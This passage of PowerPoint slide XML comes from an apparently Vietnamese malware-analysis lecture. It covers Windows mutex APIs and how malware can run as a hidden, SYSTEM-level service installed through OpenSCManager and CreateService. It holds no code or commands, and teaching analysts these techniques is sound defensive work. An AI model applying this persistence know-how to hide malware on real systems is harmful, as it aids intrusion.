              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WaitForSingleObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>yêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ReleaseMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Giải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phóng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mới</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OpenMutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tại</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9287187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err="1" smtClean="0"/>
              <a:t>Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụ</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963" y="1988840"/>
            <a:ext cx="5812074"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flipH="1">
            <a:off x="5580112" y="2276872"/>
            <a:ext cx="14401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032826" y="2092206"/>
            <a:ext cx="1374543" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> name</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296542889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err="1" smtClean="0"/>
              <a:t>Dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HĐH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ở </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Adminstrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đặt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenSCManager</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateService</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
